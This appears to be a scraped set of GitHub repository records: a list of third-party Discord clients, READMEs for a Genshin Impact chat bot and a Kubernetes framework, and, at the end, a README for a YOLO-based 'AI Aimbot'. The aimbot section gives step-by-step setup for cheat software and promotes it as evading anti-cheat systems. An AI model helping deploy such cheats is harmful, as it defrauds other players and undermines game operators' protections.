๐Ÿ”ด Discontinued | | [DiscordFlex](https://github.com/ZenithRogue/DiscordFlex) | A custom Discord client built from the ground up. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![Vue.js][Vue.js-Badge]][Vue.js-Url] | ๐Ÿ”ด Discontinued | | [micro-discord](https://github.com/soukouki/micro-discord) | Simple discord client that doesn't use javascript | [![Ruby][Ruby-Badge]][Ruby-Url] | ๐Ÿ”ด Discontinued | | [Disorder](https://github.com/lexffe/discorder) | Command line discord client | [![Go][Go-Badge]][Go-Url] | ๐Ÿ”ด Discontinued | | [Fast-Discord](https://github.com/EnyoYoen/Fast-Discord) | Client written in C++ and Qt | [![C++][C++-Badge]][C++-Url] | ๐Ÿ”ด Discontinued | | [Rikka](https://github.com/rikka-org/Rikka) | Rikka is a fast, powerful, and extendable Discord modification. It can load plugins, manage plugins, and features a rich API. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] [![JavaSript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [Harmony](https://github.com/hlafaille/Harmony) | A Java-based Discord client. | [![Java][Java-Badge]][Java-Url] | ๐Ÿ”ด Discontinued | | [6cord](https://6cord.diamondb.xyz/) | A terminal front-end for the Discord chat service | [![Go][Go-Badge]][Go-Url] | ๐Ÿ”ด Discontinued | | [Terminalcord](https://github.com/xynxynxyn/terminal-discord) | Simple terminal client for discord with a minimal look and UI. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [discord-curses](https://github.com/RX14/discord-curses) | Terminal-based discord client | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Discline](https://github.com/mitchweaver/Discline) | A terminal Discord client that you can actually use. | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued | | [GTK3cord](https://github.com/diamondburned/gtkcord3) | A Gtk3 Discord client in Golang | [![Go][Go-Badge]][Go-Url] | ๐Ÿ”ด Discontinued. development shifted to GTK4cord | | [Discord-Terminal](https://github.com/atlx/discord-term) | An extensible Discord terminal client. Can be used with bot or user tokens. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued, Looking for maintainers | | [Cordless](https://github.com/Bios-Marcel/cordless) | Cordless is a custom Discord client that aims to have a low memory footprint and be aimed at power-users. | [![Go][Go-Badge]][Go-Url] | โ›” Discontinued, Developer got banned during development | | [Discord-Lite](https://web.archive.org/web/20221230055539/https://github.com/therealcyber71/Discord-Lite) | A Light-Weight Discord Client written in Python for developers, by developers. | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued, Developer MIA, repo and account deleted | | [Voidcord](https://web.archive.org/web/20230517194514/https://github.com/logoskosmos/voidcord) | A lightweight and extendable Discord web client on top of Neutralinojs. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued, Developer repo and account deleted | ## Console clients | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [A-client-for-Discord-for-3DS](https://github.com/XeathJP/A-client-for-Discord-for-3DS) | Applications that can use discord on 3DS | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since since January 2022 | | [crcophony](https://github.com/freyamade/crcophony) | Fast, neat discord TUI written in Crystal (read: cacophony) | [![Crystal][Crystal-Badge]][Crystal-Url] | ๐ŸŸ  On hiatus, since November 2019 | | [NXCord](https://github.com/Grarak/NXCord) | Unofficial Nintendo Switch Discord client | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since April 2020 | | [Unofficial Discord 3DS Client](https://github.com/yourWaifu/Unofficial-Discord-3DS-Client) | This just a simple Discord client for the 3DS build using the `Sleepy Discord` library and the `Wslay` library. | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since November 2017 | | [Quarrel](https://github.com/UWPCommunity/Quarrel) | Quarrel is a Discord client for Windows and Xbox that aims to bring voice chat to Xbox and improved support for varying screen sizes on devices running windows. | [![C#][C#-Badge]][C#-Url] | ๐ŸŸ  On hiatus, since Augest 2022| | [VitaCord](https://github.com/devingDev/VitaCord) | Discord Client for PS Vita / PS TV | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since March 2018 | | [Switchcord](https://github.com/vbe0201/switchcord) | An unofficial Discord client for the Nintendo Switch console. | [![C++][C++-Badge]][C++-Url] | ๐Ÿ”ด Discontinued | | [3DiScord](https://github.com/cheuble/3DiScord) | A Discord client for the Nintendo 3DS | [![C++][C++-Badge]][C++-Url] | โ›” Discontinued. will get you banned | ## Other clients | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Discross](http://discross.rc24.xyz/index.html) | A webhook bridge to send messages on Discord through a webpage | [![JavaSript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [purple-discord](https://github.com/EionRobb/purple-discord) | A libpurple/Pidgin plugin for Discord | [![C][C-Badge]][C-Url] | ๐ŸŸข Active | | [Reliable Discord-client IRC Daemon (rdircd)](https://github.com/mk-fg/reliable-discord-client-irc-daemon) | Reliable personal discord-client to irc-server translation daemon | [![Python][Python-Badge]][Python-Url] | ๐ŸŸข Active | | [discord-j2me](https://github.com/gtrxAC/discord-j2me) | Discord client for Java ME (MIDP 2.0) devices | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Weechat Discord](https://github.com/terminal-discord/weechat-discord) | Weechat plugin for Discord support. | [![Rust][Rust-Badge]][Rust-Url] | ๐ŸŸข Active | | [bitlbee-discord](https://github.com/sm00th/bitlbee-discord) | Discord protocol plugin for BitlBee. | [![C][C-Badge]][C-Url] | ๐ŸŸ  On hiatus, since September 2021 | | [crocodile](https://github.com/tbodt/crocodile) | Discord client for TempleOS. | [![Python][Python-Badge]][Python-Url] | ๐ŸŸ  On hiatus, since November 2017 | | [discord-aos](https://github.com/ruslang02/discord-aos) | Discord client for Sailfish OS | [![Qt][Qt-Badge]][Qt-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸ  On hiatus, since November 2021 | | [discord-ppc](https://github.com/vistafan12/discord-ppc) | Discord version for PowerPC architecture | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸ  On hiatus, since June 2017 | | [Arcscord](https://github.com/Arcoz0308/arcscord) | NodeJS library written in typescript who interact with the Discord API | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | ## Third party server implementations The following are server implementations that reimplement Discord's client-server API: | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Reflectcord](https://github.com/V3L0C1T13S/reflectcord) | Reimplementation of Discord API Server on top of Revolt.chat, intended for self hosting | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Spacebar Chat](https://spacebar.chat/) | Almost fully featured re-implementation of Discord API Server, intended for self hosting | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Litecord](https://gitlab.com/litecord/litecord) | Partial reimplementation of Discord API Server, not intended for self hosting | [![Python][Python-Badge]][Python-Url] | ๐ŸŸ  On hiatus, since May 2023 | [^1]: Discord brought a breaking change for the mod in question. [^2]: Some occasional breaks might occur depending on the maintainers' free time. ## Contributing Please refer to [CONTRIBUTING.md](/.github/CONTRIBUTING.md) if you want to contribute to this project. ## Further comments Will update as needed! If you would like feel free to reach out to [Nekopara#4266](https://discord.com/users/1074227433395470376) (Head of Team) on the official Discord: https://discord.gg/3kv5yzTYQE ## Disclaimer We (contributors) are not responsible for you getting banned from using a 3rd party or you getting kicked from servers. [C-Badge]: https://img.shields.io/badge/C-%2300599C.svg?style=flat&logo=c&logoColor=white [C-Url]: https://en.wikipedia.org/wiki/C_(programming_language) "C" [C++-Badge]: https://img.shields.io/badge/C++-%2300599C.svg?style=flat&logo=c%2B%2B&logoColor=white [C++-Url]: https://en.wikipedia.org/wiki/C++ "C++" [C#-Badge]: https://img.shields.io/badge/C%23-%23239120.svg?style=flat&logo=c-sharp&logoColor=white [C#-Url]: https://en.wikipedia.org/wiki/C_Sharp_(programming_language) "C#" [Crystal-Badge]: https://img.shields.io/badge/Crystal-%23000000.svg?style=flat&logo=crystal&logoColor=white [Crystal-Url]: https://en.wikipedia.org/wiki/Crystal_(programming_language) "Crystal" [Dart-Badge]: https://img.shields.io/badge/Dart-%230175C2.svg?style=flat&logo=dart&logoColor=white [Dart-Url]: https://en.wikipedia.org/wiki/Dart_(programming_language) "Dart" [Go-Badge]: https://img.shields.io/badge/Go-%2300ADD8.svg?style=flat&logo=go&logoColor=white [Go-Url]: https://en.wikipedia.org/wiki/Go_(programming_language) "Go" [Java-Badge]: https://img.shields.io/badge/Java-%23ED8B00.svg?style=flat&logo=java&logoColor=white [Java-Url]: https://en.wikipedia.org/wiki/Java_(programming_language) "Java" [JavaScript-Badge]: https://img.shields.io/badge/JavaScript-%23323330.svg?style=flat&logo=javascript&logoColor=%23F7DF1E [JavaScript-Url]: https://en.wikipedia.org/wiki/JavaScript "JavaScript" [Kotlin-Badge]: https://img.shields.io/badge/Kotlin-%230095D5.svg?style=flat&logo=kotlin&logoColor=white [Kotlin-Url]: https://en.wikipedia.org/wiki/Kotlin_(programming_language) "Kotlin" [Nim-Badge]: https://img.shields.io/badge/Nim-%23161820.svg?style=flat&logo=nim&logoColor=%23ffe953 [Nim-Url]: https://en.wikipedia.org/wiki/Nim_(programming_language) "Nim" [Objective-C-Badge]: https://img.shields.io/badge/Objective%20C-000000.svg?&style=flat&logo=Apple&logoColor=white [Objective-C-Url]: https://en.wikipedia.org/wiki/Objective-C "Objective-C" [Python-Badge]: https://img.shields.io/badge/Python-3670A0?style=flat&logo=python&logoColor=ffdd54 [Python-Url]: https://en.wikipedia.org/wiki/Python_(programming_language) "Python" [Qt-Badge]: https://img.shields.io/badge/Qt-%23217346.svg?style=flat&logo=Qt&logoColor=white [Qt-Url]: https://en.wikipedia.org/wiki/QML "Qt" [Ruby-Badge]: https://img.shields.io/badge/ruby-%23CC342D.svg?style=flat&logo=ruby&logoColor=white [Ruby-Url]: https://en.wikipedia.org/wiki/Ruby_(programming_language) "Ruby" [Shell Script-Badge]: https://img.shields.io/badge/Shell_Script-%23121011.svg?style=flat&logo=gnu-bash&logoColor=white [Shell Script-Url]: https://en.wikipedia.org/wiki/Shell_script "Shell Script" [Swift-Badge]: https://img.shields.io/badge/Swift-F54A2A?style=flat&logo=swift&logoColor=white [Swift-Url]: https://en.wikipedia.org/wiki/Swift_(programming_language) "Swift" [TypeScript-Badge]: https://img.shields.io/badge/TypeScript-%23007ACC.svg?style=flat&logo=typescript&logoColor=white [TypeScript-Url]: https://en.wikipedia.org/wiki/TypeScript "TypeScript" [Vue.js-Badge]: https://img.shields.io/badge/Vue.js-%2335495e.svg?style=flat&logo=vuedotjs&logoColor=%234FC08D [Vue.js-Url]: https://en.wikipedia.org/wiki/Vue.js "Vue.js" [Zig-Badge]: https://img.shields.io/badge/Zig-%23F7A41D.svg?style=flat&logo=zig&logoColor=white [Zig-Url]: https://en.wikipedia.org/wiki/Zig_(programming_language) "Zig" [Rust-Badge]: https://img.shields.io/badge/Rust-%23000000.svg?&logo=Rust [Rust-url]: https://en.wikipedia.org/wiki/Rust "Rust" [React-Badge]: https://img.shields.io/badge/React-%2361DAFB?style=flat&logo=react&labelColor=black&color=blue [React-url]: https://en.wikipedia.org/wiki/React_(software) "React"
A non-exhaustive collection of third-party clients and mods for Discord.
discord,discord-client,discord-mod,discord-libraries,discord-library,encyclopedia,listing
0
42
89
258
2
1
0
CMHopeSunshine/LittlePaimon
<p align="center" > <a href="https://github.com/CMHopeSunshine/LittlePaimon/tree/nonebot2"><img src="https://s1.ax1x.com/2023/02/05/pS62DJK.png" width="256" height="256" alt="LittlePaimon"></a> </p> <h1 align="center">ๅฐๆดพ่’™|LittlePaimon</h1> <h4 align="center">โœจๅŸบไบŽ<a href="https://github.com/nonebot/nonebot2" target="_blank">NoneBot2</a>็š„ๅŽŸ็ฅžๆœบๅ™จไบบโœจ</h4> <p align="center"> <a href="https://cdn.jsdelivr.net/gh/CMHopeSunshine/LittlePaimon@master/LICENSE"><img src="https://img.shields.io/github/license/CMHopeSunshine/LittlePaimon" alt="license"></a> <img src="https://img.shields.io/badge/Python-3.8+-yellow" alt="python"> </p> ## ไธจ็ฎ€ไป‹ ๅŽŸ็ฅžๅคšๅŠŸ่ƒฝๆœบๅ™จไบบ๏ผŒๆŸฅ่ฏขๆธธๆˆไฟกๆฏใ€ๅ›พ้‰ดๆ”ป็•ฅใ€ๆ ‘่„‚ๆ้†’็ญ‰็ญ‰๏ผŒไปฅๅŠๅ„็งๅ„ๆ ท็š„ๅฅฝ็Žฉ็š„ๅŠŸ่ƒฝ๏ผŒไธไป…ไป…ๆ˜ฏๅŽŸ็ฅžใ€‚ ็›ฎๅ‰ๆš‚ๅชๆ”ฏๆŒonebotๅ่ฎฎ๏ผŒๆญฃๅœจๅผ€ๅ‘ๅคš่Šๅคฉๅนณๅฐ็š„~~่ˆนๆ–ฐ~~็‰ˆๆœฌใ€‚ ## ไธจๅฟซ้€Ÿ้ƒจ็ฝฒ ไฝฟ็”จ[ๅฐๆดพ่’™่„šๆ‰‹ๆžถๆ’ไปถ](https://github.com/CMHopeSunshine/nb-cli-plugin-littlepaimon)ๅฟซ้€Ÿ้ƒจ็ฝฒๅฎ‰่ฃ…ๅฐๆดพ่’™ใ€‚ [![asciicast](https://asciinema.org/a/kMBRbuX5lCEnk5lmXcU53ys5b.svg)](https://asciinema.org/a/kMBRbuX5lCEnk5lmXcU53ys5b) ## ไธจๆ–‡ๆกฃ > [ๆ–‡ๆกฃๅœฐๅ€](docs.paimon.cherishmoon.top) ## | ๅŠŸ่ƒฝ็คบไพ‹ <details> <summary>ๅธฎๅŠฉๅˆ—่กจ</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gWCT.jpg" alt="help"> </details> <details> <summary>็Žฉๅฎถๅก็‰‡</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6g25V.jpg" alt="ys"> </details> <details> <summary>่ง’่‰ฒ่ƒŒๅŒ…</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6ggU0.jpg" alt="ysa"> </details> <details> <summary>่ง’่‰ฒ้ขๆฟ</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gh2F.jpg" alt="ysd"> </details> <details> <summary>่ง’่‰ฒๅก็‰‡</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gf8U.jpg" alt="ysc"> </details> <details> <summary>ๆทฑๆธŠๆˆ˜ๆŠฅ</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gcEq.jpg" alt="sy"> </details> <details> <summary>ๅฎžๆ—ถไพฟ็ญพ</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6gybn.jpg" alt="ssbq"> </details> <details> <summary>่ง’่‰ฒๅ›พ้‰ด</summary> <img src="https://s1.ax1x.com/2023/02/05/pS6fAG6.jpg" alt="map"> </details> ## | Playwright็›ธๅ…ณ้—ฎ้ข˜ ๅ› ้ƒจๅˆ†็ณป็ปŸไธ้€‚็”จไบŽchromium๏ผˆ่ฐทๆญŒๆต่งˆๅ™จ๏ผ‰๏ผŒๆ•…ๅฐ†้ป˜่ฎคๅ†…ๆ ธๆ”นไธบFireFox ๅฆ‚้œ€ๅˆ‡ๆข๏ผŒๅฏๆ›ดๆ”น config/paimon_config_default.yml ็š„้ป˜่ฎคๅ€ผ ## | ๅธธ่ง้—ฎ้ข˜&่‡ด่ฐข ่ฏฆ่ง[ๅธธ่ง้—ฎ้ข˜](https://docs.paimon.cherishmoon.top/question.html)ๅ’Œ[่‡ด่ฐข](https://docs.paimon.cherishmoon.top/thanks.html)ใ€‚ ## | ๅ…ถไป– - ๅฆ‚ๆžœไฝ ๅ–œๆฌข่ฟ™ไธช้กน็›ฎ๏ผŒๆฌข่ฟŽ็ป™ไธชstarๆˆ–่€…[็ˆฑๅ‘็”ต](https://afdian.net/a/cherishmoon)๏ผŒๅๅˆ†ๆ„Ÿ่ฐขใ€‚ - ๆœฌ้กน็›ฎๅฎŒๅ…จๅผ€ๆบๅ…่ดน๏ผŒไป…ไพ›ๅญฆไน ไฝฟ็”จ๏ผŒ็ฆๆญข็”จไบŽๅ•†ไธš็”จ้€”ๅ’Œ้žๆณ•่กŒไธบ๏ผŒๅฆ‚ๆœ‰ไป–ไบบ้žๆณ•ไฝฟ็”จ๏ผŒไธŽๆœฌไฝœ่€…ๆ— ๅ…ณใ€‚ - ๅฆ‚ๆžœๆ‚จไฝฟ็”จๅนถไฟฎๆ”นไบ†ๆœฌ้กน็›ฎๆบ็ ๏ผŒ่ฏท้ตๅพช[AGPL-3.0](https://github.com/CMHopeSunshine/LittlePaimon/blob/Bot/LICENSE)ๅฐ†ๆบ็ ๅผ€ๆบใ€‚
ๅฐๆดพ่’™๏ผๅŸบไบŽNonebot2็š„ๅŽŸ็ฅžๆœบๅ™จไบบ๏ผŒๅŒ…ๆ‹ฌไฝ†ไธ้™ไบŽUID้ขๆฟๆŸฅ่ฏขใ€ๆŠฝๅก่ฎฐๅฝ•ๅˆ†ๆžใ€ๆธธๆˆๆ”ป็•ฅๅ›พ้‰ดใ€ๅฎžๆ—ถไพฟ็ญพใ€ๅŽŸ็Ÿณๆœญ่ฎฐใ€็พค่Šๅญฆไน ใ€็พค็ฎก็ญ‰ๅŠŸ่ƒฝใ€‚/ LittlePamon! Genshin Impact multifunctional bot based on Nonebot2.
qqbot,genshin,genshin-impact,nonebot,python,mihoyo,chatbot,nonebot2,onebot
1
21
98
449
33
5
2
acorn-io/runtime
# Acorn ![main-release](https://github.com/acorn-io/runtime/actions/workflows/main-release.yaml/badge.svg) A simple application deployment framework for Kubernetes. - One artifact across dev, test, and production - Simple CLI and powerful API - Runs on any Kubernetes cluster | :memo: | Acorn is a work in progress. Features will evolve over time and there may be breaking changes between releases. Please give us your feedback in Slack, Discussions, or Issues! | |-|:-| ## Get Started - [Downloads](https://github.com/acorn-io/runtime/releases) - [Runtime Documentation](https://runtime-docs.acorn.io) - [Community Slack](https://slack.acorn.io) - [Discussions Forum](https://github.com/acorn-io/runtime/discussions) ## Contributing For the basics on how to contribute to acorn, checkout [CONTRIBUTING.md](CONTRIBUTING.md). More details can also be found in our [developer wiki](https://github.com/acorn-io/runtime/wiki). ## License Copyright (c) 2023 [Acorn Labs, Inc.](http://acorn.io) Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at [http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0) Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
A simple application deployment framework built on Kubernetes
hacktoberfest,kubernetes
100
39
1,597
2,687
223
29
5
RootKit-Org/AI-Aimbot
๏ปฟ# ๐ŸŽฏ World's Best AI Aimbot ๐ŸŽฎ ![World's Best AI Aimbot Banner](imgs/banner.png) [![Pull Requests Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat)](http://makeapullrequest.com) ## โœจBEST EXPERIENCE, Use our Launcher and the Launcher Custom Code Pack!โœจ ### Over 10,000 users use the Launcher ### ๐Ÿ”ด LIVE: Aimbot Internation 2024 - Win $1,000s Prepare your custom code and submit it for the aimbot internation which ends later this year. Work alone or solo. Check out the following videos to learn more. All custom code must be submitting thru the launcher. https://youtube.com/live/mtV6w2qhaNs?feature=share Download the [RootKit Launcher](https://github.com/RootKit-Org/Launcher). It is FREE. **No coding required.** It will auto-setup everything for you! Want to make your own bot? Then use the [Starter Code Pack](https://github.com/RootKit-Org/AI-Aimbot-Starter-Code)! ## ๐Ÿ™Œ Welcome Aboard! We're a charity on a mission to educate and certify the upcoming wave of developers in the world of Computer Engineering ๐ŸŒ. Need assistance? Hop into our [Discord](https://discord.gg/rootkitorg) and toss your questions at `@Wonder` in the *#ai-aimbot channel* (be sure to stick to this channel or face the consequences! ๐Ÿ˜ฌ). Type away your query and include `@Wonder` in there. Our *AI Aimbot* ๐Ÿค– sharpshoots targets in **any game with humanoid characters**, harnessing the power of [YOLOv5](https://github.com/ultralytics). Currently, it's a ninja against anti-cheat systems, as it's visual-only. Still, watch out for manual player reports! ๐Ÿ‘€ Intended for educational use ๐ŸŽ“, our aim is to highlight the vulnerability of game devs to AI-driven cheats. Pass it along to your game developer buddies, and save their games from being outsmarted! **โš  Use at your own risk! If you're caught... well, you've been warned!** ## ๐Ÿ“น Instructional Media - [Watch the tutorial video (Works But Outdated)](https://www.youtube.com/watch?v=TCJHLbbeLhg) - [Watch the live stream explainer (Works But Outdated)](https://www.youtube.com/watch?v=uniL5yR7y0M&ab_channel=RootKit) - [Join the Discord](https://discord.gg/rootkitorg) ## There are 3 Versions ๐Ÿš€๐Ÿšฆ๐Ÿ–ฅ๏ธ - Fast ๐Ÿƒโ€โ™‚๏ธ - `main.py` โœ… Easy to set up, Works on any computer ๐Ÿ’ป - Faster ๐Ÿƒโ€โ™‚๏ธ๐Ÿ’จ - `main_onnx.py` โš™๏ธ May need to edit a file, Works on any computer ๐Ÿ’ป - Fastest ๐Ÿš€ - `main_tensorrt.py` ๐Ÿข Enterprise level hard, Works on computers with Nvidia GPUs only ๐ŸŽฎ ## ๐Ÿงฐ Requirements - Nvidia RTX 980 ๐Ÿ†™, higher or equivalent - And one of the following: - Nvidia CUDA Toolkit 11.8 [DOWNLOAD HERE](https://developer.nvidia.com/cuda-11-8-0-download-archive) ## ๐Ÿš€ Pre-setup Steps 1. Download and Unzip the AI Aimbot and stash the folder somewhere handy ๐Ÿ—‚๏ธ. 2. Ensure you've got Python installed (like a pet python ๐Ÿ) โ€“ grab version 3.11 [HERE](https://www.python.org/downloads/release/python-3116/). - ๐Ÿ›‘ Facing a `python is not recognized...` error? [WATCH THIS!](https://youtu.be/E2HvWhhAW0g) - ๐Ÿ›‘ Is it a `pip is not recognized...` error? [WATCH THIS!](https://youtu.be/zWYvRS7DtOg) 3. Fire up `PowerShell` or `Command Prompt` on Windows ๐Ÿ”. 4. To install `PyTorch`, select the appropriate command based on your GPU. - Nvidia `pip install torch==2.0.1 torchvision==0.15.2 torchaudio==2.0.2 --index-url https://download.pytorch.org/whl/cu118` - AMD or CPU `pip install torch torchvision torchaudio` 5. ๐Ÿ“ฆ Run the command below to install the required Open Source packages: ``` pip install -r requirements.txt ``` ## ๐Ÿ”Œ How to Run (Fast ๐Ÿƒโ€โ™‚๏ธ Version) Follow these steps **after** Python and all packages have been installed: 1. Open `PowerShell` โšก or `Command Prompt` ๐Ÿ’ป. 2. Input `cd `, then drag & drop the folder containing the bot code into the terminal. 3. Hit Enter โ†ฉ๏ธ. 4. Type `python main.py` and press Enter. 5. Use **CAPS_LOCK** to toggle the aimbot ๐ŸŽฏ. It begins in the *off* state. 6. Pressing `q` ๐Ÿ’ฃ at **ANY TIME** will shut down the program. ## ๐Ÿ”Œ How to Run (Faster ๐Ÿƒโ€โ™‚๏ธ๐Ÿ’จ Version) Follow these steps **after** Python and all packages have been installed: 1. Open the `config.py` ๐Ÿ“„ file and tweak the `onnxChoice` variable to correspond with your hardware specs: - `onnxChoice = 1` # CPU ONLY ๐Ÿ–ฅ - `onnxChoice = 2` # AMD/NVIDIA ONLY ๐ŸŽฎ - `onnxChoice = 3` # NVIDIA ONLY ๐ŸŽ๏ธ 2. IF you have an NVIDIA set up, run the following ``` pip install onnxruntime-gpu pip install cupy-cuda11x ``` 2. Follow the same steps as for the Fast ๐Ÿƒโ€โ™‚๏ธ Version above except for step 4, you will run `python main_onnx.py` instead. ## ๐Ÿ”Œ How to Run (Fastest ๐Ÿš€ Version) Follow these sparkly steps to get your TensorRT ready for action! ๐Ÿ› ๏ธโœจ 1. **Introduction** ๐ŸŽฌ Watch the TensorRT section of the setup [video ๐ŸŽฅ](https://www.youtube.com/watch?v=uniL5yR7y0M&ab_channel=RootKit) before you begin. It's loaded with useful tips! 2. **Oops! Don't Forget the Environment** ๐ŸŒฑ We forgot to mention adding environmental variable paths in the video. Make sure to do this part! 3. **Get Support If You're Stumped** ๐Ÿค” If you ever feel lost, you can always `@Wonder` your questions in our [Discord ๐Ÿ’ฌ](https://discord.gg/rootkitorg). Wonder is here to help! 4. **Install Cupy** Run the following `pip install cupy-cuda11x` 5. **CUDNN Installation** ๐Ÿงฉ Click to install [CUDNN ๐Ÿ“ฅ](https://developer.nvidia.com/downloads/compute/cudnn/secure/8.9.6/local_installers/11.x/cudnn-windows-x86_64-8.9.6.50_cuda11-archive.zip/). You'll need a Nvidia account to proceed. Don't worry it's free. 6. **Unzip and Relocate** ๐Ÿ“โžก๏ธ Open the .zip CuDNN file and move all the folders/files to where the CUDA Toolkit is on your machine, usually at `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8`. 7. **Get TensorRT 8.6 GA** ๐Ÿ”ฝ Fetch [`TensorRT 8.6 GA ๐Ÿ›’`](https://developer.nvidia.com/downloads/compute/machine-learning/tensorrt/secure/8.6.1/zip/TensorRT-8.6.1.6.Windows10.x86_64.cuda-11.8.zip). 8. **Unzip and Relocate** ๐Ÿ“โžก๏ธ Open the .zip TensorRT file and move all the folders/files to where the CUDA Toolkit is on your machine, usually at `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8`. 9. **Python TensorRT Installation** ๐ŸŽก Once you have all the files copied over, you should have a folder at `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\python`. If you do, good, then run the following command to install TensorRT in python. ``` pip install "C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\python\tensorrt-8.6.1-cp311-none-win_amd64.whl" ``` ๐Ÿšจ If the following steps didn't work, don't stress out! ๐Ÿ˜… The labeling of the files corresponds with the Python version you have installed on your machine. We're not looking for the 'lean' or 'dispatch' versions. ๐Ÿ” Just locate the correct file and replace the path with your new one. ๐Ÿ”„ You've got this! ๐Ÿ’ช 10. **Set Your Environmental Variables** ๐ŸŒŽ Add these paths to your environment: - `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\lib` - `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\libnvvp` - `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin` 11. **Download Pre-trained Models** ๐Ÿค– You can use one of the .engine models we supply. But if it doesn't work, then you will need to re-export it. Grab the `.pt` file here for the model you want. We recommend `yolov5s.py` or `yolov5m.py` [HERE ๐Ÿ”—](https://github.com/ultralytics/yolov5/releases/tag/v7.0). 12. **Run the Export Script** ๐Ÿƒโ€โ™‚๏ธ๐Ÿ’ป Time to execute `export.py` with the following command. Patience is key; it might look frozen, but it's just concentrating hard! Can take up to 20 minutes. ``` python .\export.py --weights ./yolov5s.pt --include engine --half --imgsz 320 320 --device 0 ``` Note: You can pick a different YOLOv5 model size. TensorRT's power allows for larger models if desired! If you've followed these steps, you should be all set with TensorRT! โš™๏ธ๐Ÿš€ ## โš™๏ธ Configurable Settings *Default settings are generally great for most scenarios. Check out the comments in the code for more insights. ๐Ÿ” The configuration settings are now located in the `config.py` file!<br> **CAPS_LOCK is the default for flipping the switch on the autoaim superpower! โš™๏ธ ๐ŸŽฏ** `useMask` - Set to `True` or `False` to turn on and off ๐ŸŽญ `maskWidth` - The width of the mask to use. Only used when `useMask` is `True` ๐Ÿ“ `maskHeight` - The height of the mask to use. Only used when `useMask` is `True` ๐Ÿ“ `aaQuitKey` - The go-to key is `q`, but if it clashes with your game style, swap it out! โŒจ๏ธโ™ป๏ธ `headshot_mode` - Set to `False` if you're aiming to keep things less head-on and more centered. ๐ŸŽฏโžก๏ธ๐Ÿ‘• `cpsDisplay` - Toggle off with `False` if you prefer not to display the CPS in your command station. ๐Ÿ’ป๐Ÿšซ `visuals` - Flip to `True` to witness the AI's vision! Great for sleuthing out any hiccups. ๐Ÿ•ต๏ธโ€โ™‚๏ธโœ… `aaMovementAmp` - The preset should be on point for 99% of players. Lower the digits for smoother targeting. Recommended doses: `0.5` - `2`. โš–๏ธ๐Ÿ•น๏ธ `confidence` - Stick with the script here unless you're the expert. ๐Ÿงโœจ `screenShotHeight` - Same as above, no need for changes unless you've got a specific vision. ๐Ÿ“๐Ÿ–ผ๏ธ `screenShotWidth` - Keep it constant as is, unless you've got reasons to adjust. ๐Ÿ“๐Ÿ–ผ๏ธ `aaDetectionBox` - Default's your best bet, change only if you've got the know-how. ๐Ÿ“ฆโœ… `onnxChoice` - Gear up for the right graphics cardโ€”Nvidia, AMD, or CPU power! ๐Ÿ’ป๐Ÿ‘พ `centerOfScreen` - Keep this switched on to stay in the game's heart. โค๏ธ๐Ÿ–ฅ๏ธ ## ๐Ÿ“Š Current Stats The bot's efficiency depends on your setup. We achieved 100-150 CPS with our test specs below ๐Ÿš€. - AMD Ryzen 7 2700 - 64 GB DDR4 - Nvidia RTX 3080 ๐Ÿ’ก Tip: Machine Learning can be tricky, so reboot if you keep hitting CUDA walls. ## ๐Ÿค Community Based We're all about collaboration. Your contributions can earn you credit and potential ๐Ÿ’ฐ! **Want to volunteer? Have video or program ideas? Tell us!** ## โš ๏ธ Known Cheat-Detectable Games Splitgate (reported by a Discord user ๐Ÿ•ต๏ธโ€โ™‚๏ธ), EQU8 detects win32 mouse movement library. ## ๐Ÿš€ Custom Aimbots and Models Show off your work or new models via Pull Requests in `customScripts` or `customModels` directories, respectively. Check out the `example-user` folder for guidance. ## ๐ŸŒ  Future Ideas - [x] Mask Player to avoid false positives Happy 